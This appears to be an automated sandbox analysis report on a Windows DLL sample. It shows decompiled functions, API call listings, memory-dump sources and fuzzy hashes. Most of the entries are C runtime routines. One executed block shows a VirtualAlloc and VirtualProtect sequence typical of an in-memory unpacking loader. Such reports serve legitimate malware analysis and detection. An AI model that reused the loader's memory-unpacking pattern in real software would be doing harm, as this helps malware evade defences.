                                                                                                                • Instruction Fuzzy Hash: 8EB012B0301A1247CF1C0B39541D10937D59749301340407D7003C1540DF20C850DF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E6E1F2184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				void* __ebp;
                                                                                                                				signed int* _t43;
                                                                                                                				char _t44;
                                                                                                                				void* _t46;
                                                                                                                				void* _t49;
                                                                                                                				intOrPtr* _t53;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				long _t66;
                                                                                                                				signed int* _t80;
                                                                                                                				signed int* _t82;
                                                                                                                				void* _t84;
                                                                                                                				signed int _t86;
                                                                                                                				void* _t89;
                                                                                                                				void* _t95;
                                                                                                                				void* _t96;
                                                                                                                				void* _t99;
                                                                                                                				void* _t106;
                                                                                                                
                                                                                                                				_t43 = _t84;
                                                                                                                				_t65 = __ebx + 2;
                                                                                                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                				_t89 = _t95;
                                                                                                                				_t96 = _t95 - 8;
                                                                                                                				_push(_t65);
                                                                                                                				_push(_t84);
                                                                                                                				_push(_t89);
                                                                                                                				asm("cld");
                                                                                                                				_t66 = _a8;
                                                                                                                				_t44 = _a4;
                                                                                                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                					_push(_t89);
                                                                                                                					E6E1F22EB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                					_t46 = 1;
                                                                                                                				} else {
                                                                                                                					_v12 = _t44;
                                                                                                                					_v8 = _a12;
                                                                                                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                					_t86 =  *(_t66 + 0xc);
                                                                                                                					_t80 =  *(_t66 + 8);
                                                                                                                					_t49 = E6E1F23A5(_t66);
                                                                                                                					_t99 = _t96 + 4;
                                                                                                                					if(_t49 == 0) {
                                                                                                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                						goto L11;
                                                                                                                					} else {
                                                                                                                						while(_t86 != 0xffffffff) {
                                                                                                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                							if(_t53 == 0) {
                                                                                                                								L8:
                                                                                                                								_t80 =  *(_t66 + 8);
                                                                                                                								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								_t54 =  *_t53();
                                                                                                                								_t89 = _t89;
                                                                                                                								_t86 = _t86;
                                                                                                                								_t66 = _a8;
                                                                                                                								_t55 = _t54;
                                                                                                                								_t106 = _t54;
                                                                                                                								if(_t106 == 0) {
                                                                                                                									goto L8;
                                                                                                                								} else {
                                                                                                                									if(_t106 < 0) {
                                                                                                                										_t46 = 0;
                                                                                                                									} else {
                                                                                                                										_t82 =  *(_t66 + 8);
                                                                                                                										E6E1F2290(_t55, _t66);
                                                                                                                										_t89 = _t66 + 0x10;
                                                                                                                										E6E1F22EB(_t89, _t66, 0);
                                                                                                                										_t99 = _t99 + 0xc;
                                                                                                                										E6E1F2387(_t82[2]);
                                                                                                                										 *(_t66 + 0xc) =  *_t82;
                                                                                                                										_t66 = 0;
                                                                                                                										_t86 = 0;
                                                                                                                										 *(_t82[2])(1);
                                                                                                                										goto L8;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L13;
                                                                                                                						}
                                                                                                                						L11:
                                                                                                                						_t46 = 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L13:
                                                                                                                				return _t46;
                                                                                                                			}
























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                • Instruction ID: 3c5099f25826ff087e34c236c310a0c908b4a1aaea059ed350b99d4d53d6bd3b
                                                                                                                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                • Instruction Fuzzy Hash: A421D672900245DFD700DFA8DC809ABB7E9FF49350B058468D9198B245DB30FA56DBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.493360055.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                • Instruction ID: a809065028fa7fc9eae307e9d95acfe7988031bd9fd7cdfe6c807587327fbfef
                                                                                                                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                • Instruction Fuzzy Hash: 02119377340505DFD758DE99DC90EA273EBEBA9230B25816AED04CB305D675E841CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.493360055.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                • Instruction ID: 6af46625d6bf2392fb366cbecfb3e7e3e5bb25e1300e657b956a21da3e7137b8
                                                                                                                • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                                                                                • Instruction Fuzzy Hash: 0101F97235820ACFEB4CCF6DD994D6AB7E5EBC2735B15C07EC4468B615D130E845CA10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlDecodePointer.NTDLL ref: 6E222EC5
                                                                                                                • _free.LIBCMT ref: 6E222EDE
                                                                                                                  • Part of subcall function 6E21B190: HeapFree.KERNEL32(00000000,00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?), ref: 6E21B1A4
                                                                                                                  • Part of subcall function 6E21B190: GetLastError.KERNEL32(00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?,6E2117F0), ref: 6E21B1B6
                                                                                                                • _free.LIBCMT ref: 6E222EF1
                                                                                                                • _free.LIBCMT ref: 6E222F0F
                                                                                                                • _free.LIBCMT ref: 6E222F21
                                                                                                                • _free.LIBCMT ref: 6E222F32
                                                                                                                • _free.LIBCMT ref: 6E222F3D
                                                                                                                • _free.LIBCMT ref: 6E222F61
                                                                                                                • RtlEncodePointer.NTDLL(6E2E1328), ref: 6E222F68
                                                                                                                • _free.LIBCMT ref: 6E222F7D
                                                                                                                • _free.LIBCMT ref: 6E222F93
                                                                                                                • _free.LIBCMT ref: 6E222FBB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3064303923-0
                                                                                                                • Opcode ID: 5b5bb7c9301ef248a3c30a0e7afd35ec5b24d1b92594c4c4de5e6a5d03010440
                                                                                                                • Instruction ID: 799979962d3cdf6e5a6397446c016b0074f5cbbe36725c32146b60193166ad93
                                                                                                                • Opcode Fuzzy Hash: 5b5bb7c9301ef248a3c30a0e7afd35ec5b24d1b92594c4c4de5e6a5d03010440
                                                                                                                • Instruction Fuzzy Hash: 802191B7905A6ACFCF189FA4D84C4D937FBA70E7213560439E50897248CB319884CAA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _strcspnctypestd::ios_base::getloc$Mpunct_localeconvstd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 484443084-2766056989
                                                                                                                • Opcode ID: 902d90ec1dbd6a6bff5a6f224e5f3ff10c48eb46573f78ad390fbe1b9762889e
                                                                                                                • Instruction ID: 68172b4438070352d91321e7d46cf41d073ba7545916c9854bd47da757fb5693
                                                                                                                • Opcode Fuzzy Hash: 902d90ec1dbd6a6bff5a6f224e5f3ff10c48eb46573f78ad390fbe1b9762889e
                                                                                                                • Instruction Fuzzy Hash: 3C021BB591424DDFCB04CFD8C990BEEBBFABF48304F148559E619AB254D734AA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21314A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213163
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID: xD!n
                                                                                                                • API String ID: 172949856-3737725903
                                                                                                                • Opcode ID: d96d8b36e82e3bf78a0dc4e6e46db0319e29a104ad00c1452de9462ce398307a
                                                                                                                • Instruction ID: 1526b63b973e07b94f63ec4948504a02cb27956ec9b3f848b82e6ea837ad7c94
                                                                                                                • Opcode Fuzzy Hash: d96d8b36e82e3bf78a0dc4e6e46db0319e29a104ad00c1452de9462ce398307a
                                                                                                                • Instruction Fuzzy Hash: 4C31E5B591821DDFCB08CFD4C885AEEB7FABB48314F104629E525A7380DB345A05CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2441703863-2766056989
                                                                                                                • Opcode ID: 7dc808567650502c7f0f2f498eaf718fc9a92b0a3f6abd0c1f725c9ebac6b586
                                                                                                                • Instruction ID: 9e17f60067dce32cf3ccb629134599fd5f2ec4cf591a07700114c87b57f43bdf
                                                                                                                • Opcode Fuzzy Hash: 7dc808567650502c7f0f2f498eaf718fc9a92b0a3f6abd0c1f725c9ebac6b586
                                                                                                                • Instruction Fuzzy Hash: 2DE129B591424D9FCB04CF94C990BEEBBFABF48304F14855DE619AB254D734AE41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$_strlenctypestd::ios_base::getlocstd::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 2376101104-0
                                                                                                                • Opcode ID: d0c6eebec1b5825cc0edb6de61a1b31256547073392af8b85d58de306a92d1db
                                                                                                                • Instruction ID: e01b2be2b7cdd61ea19651d234833147f6917c1b003d61b7ba67f9e81d0cb02a
                                                                                                                • Opcode Fuzzy Hash: d0c6eebec1b5825cc0edb6de61a1b31256547073392af8b85d58de306a92d1db
                                                                                                                • Instruction Fuzzy Hash: 75D106B990424D9FDB08CFE4C490BEEBBF6BF49308F108519E605AB350DB34AA41DB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E219B62
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E219B6C
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E219B83
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                • codecvt.LIBCPMT ref: 6E219BA6
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 6E219BBA
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 6E219BC8
                                                                                                                • std::_Facet_Register.LIBCPMT ref: 6E219BDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1512642153-0
                                                                                                                • Opcode ID: abcf18ad089c7f56547f3e686bf2d833d332b21dfecf0e07f77a0f88c6e9ebc0
                                                                                                                • Instruction ID: f56be8d723a8534da3fbe536a98ba0d05944990958eaff0203f1474324218119
                                                                                                                • Opcode Fuzzy Hash: abcf18ad089c7f56547f3e686bf2d833d332b21dfecf0e07f77a0f88c6e9ebc0
                                                                                                                • Instruction Fuzzy Hash: 3D015B7A91812D9BCF09DBE0C804AEE73BFAF44659F210925E611AB290DF349B15CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21324A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213263
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                • Opcode ID: 068503c4cd893672f925eae8312afaeaa9a4c8984b1dd976c0757d6dadb611c6
                                                                                                                • Instruction ID: d6602f3f3874595b9d2e03d27138265d8c17a9c7fc5d24b023864ff8ece87846
                                                                                                                • Opcode Fuzzy Hash: 068503c4cd893672f925eae8312afaeaa9a4c8984b1dd976c0757d6dadb611c6
                                                                                                                • Instruction Fuzzy Hash: E431E5B5D1821D9FCB08DFD4C985AEEB7FABB49314F104629E525A7380DB345A40CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
                                                                                                                • String ID:
                                                                                                                • API String ID: 2314865971-0
                                                                                                                • Opcode ID: e2fd357471b6e8576f41e2335edaf411aed2342827a90aac2887e03cad9011d4
                                                                                                                • Instruction ID: 193701162b87c6eeec388bf35060330a4c2fb60c51fde7c7bf291a493be531ed
                                                                                                                • Opcode Fuzzy Hash: e2fd357471b6e8576f41e2335edaf411aed2342827a90aac2887e03cad9011d4
                                                                                                                • Instruction Fuzzy Hash: 2BF0C23A10C62A9FE624ABF47C256CF26CBDF01239F200A3AE161D81C4EF1185428598
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ____lc_codepage_func.LIBCMT ref: 6E2193E3
                                                                                                                • __calloc_crt.LIBCMT ref: 6E2193F4
                                                                                                                  • Part of subcall function 6E21E636: __calloc_impl.LIBCMT ref: 6E21E645
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219407
                                                                                                                • _memmove.LIBCMT ref: 6E219410
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219421
                                                                                                                • ____lc_locale_name_func.LIBCMT ref: 6E21942D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1321936363-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __Getcvt.LIBCPMT ref: 6E21956A
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,?,00000002,00000000,00000000), ref: 6E2195B8
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E21962E
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E219656
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Getcvt
                                                                                                                • String ID: :-!n
                                                                                                                • API String ID: 3195005509-2832354262
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 6E2282D8
                                                                                                                  • Part of subcall function 6E21B1C8: __FF_MSGBANNER.LIBCMT ref: 6E21B1DF
                                                                                                                  • Part of subcall function 6E21B1C8: __NMSG_WRITE.LIBCMT ref: 6E21B1E6
                                                                                                                  • Part of subcall function 6E21B1C8: RtlAllocateHeap.NTDLL(6E2E134C,00000000,00000001), ref: 6E21B20B
                                                                                                                • _free.LIBCMT ref: 6E2282EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1020059152-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traitsconstruct
                                                                                                                • String ID: ?4!n$?4!n
                                                                                                                • API String ID: 489808500-3570167787
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$std::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 735177774-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Mpunctstd::ios_base::getloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 76177404-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2782032738-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E229878
                                                                                                                • __isleadbyte_l.LIBCMT ref: 6E2298A6
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E2298D4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E22990A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBCMT ref: 6E21D320
                                                                                                                  • Part of subcall function 6E21D948: ___BuildCatchObjectHelper.LIBCMT ref: 6E21D97A
                                                                                                                  • Part of subcall function 6E21D948: ___AdjustPointer.LIBCMT ref: 6E21D991
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6E21D337
                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 6E21D349
                                                                                                                • CallCatchBlock.LIBCMT ref: 6E21D36D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2901542994-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                • API String ID: 233258989-233714265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                • API String ID: 233258989-233714265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213C74
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213CD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::good
                                                                                                                • String ID: 2)!n
                                                                                                                • API String ID: 3100596842-1785711589
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                • std::locale::locale.LIBCPMTD ref: 6E2117EB
                                                                                                                  • Part of subcall function 6E213B70: std::locale::_Init.LIBCPMT ref: 6E213B79
                                                                                                                • _setlocale.LIBCMT ref: 6E2117FE
                                                                                                                  • Part of subcall function 6E21C33C: _mbstowcs_s.LIBCMT ref: 6E21C362
                                                                                                                  • Part of subcall function 6E21C33C: __invoke_watson.LIBCMT ref: 6E21C37D
                                                                                                                  • Part of subcall function 6E21C33C: __calloc_crt.LIBCMT ref: 6E21C387
                                                                                                                • SetConsoleOutputCP.KERNEL32(000004E3), ref: 6E21181E
                                                                                                                • GetModuleFileNameA.KERNELBASE(00000000,6E24CB58,000008C6,?,?,00000006,00000000), ref: 6E211850
                                                                                                                • SetConsoleCP.KERNEL32(00000000), ref: 6E2118D9
                                                                                                                • _malloc.LIBCMT ref: 6E2118E4
                                                                                                                • GetCurrentDirectoryA.KERNEL32(000008C6,?,00000000), ref: 6E211A5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Console$CurrentDirectoryFileInitModuleNameOutput__calloc_crt__invoke_watson_malloc_mbstowcs_s_setlocalestd::locale::_std::locale::locale
                                                                                                                • String ID: ^9DGU
                                                                                                                • API String ID: 1969868346-529033273
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6E24DD28), ref: 6E24E395
                                                                                                                • VirtualAlloc.KERNEL32(00000000,000000BC,00003000,00000040,6E24DD8A), ref: 6E24E3CC
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00014035,00003000,00000040), ref: 6E24E42C
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E462
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E24E2B7), ref: 6E24E567
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E24E2B7), ref: 6E24E58E
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7), ref: 6E24E65B
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7,?), ref: 6E24E6B1
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E6CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495341087.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2574235972-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213063
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::_Init.LIBCPMT ref: 6E21A534
                                                                                                                  • Part of subcall function 6E21A074: std::ios_base::clear.LIBCPMTD ref: 6E21A0A3
                                                                                                                  • Part of subcall function 6E21A074: std::locale::_Init.LIBCPMT ref: 6E21A0B8
                                                                                                                  • Part of subcall function 6E21AC30: __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                  • Part of subcall function 6E21AC30: std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                • std::ios_base::clear.LIBCPMTD ref: 6E21A561
                                                                                                                • std::ios_base::_Addstd.LIBCPMT ref: 6E21A56D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Initstd::ios_base::_std::ios_base::clear$AddstdH_prolog3std::ios_base::getlocstd::locale::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327797918-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                • std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                  • Part of subcall function 6E2188A0: std::locale::locale.LIBCPMTD ref: 6E2188BA
                                                                                                                  • Part of subcall function 6E213020: std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E213020: int.LIBCPMTD ref: 6E213063
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
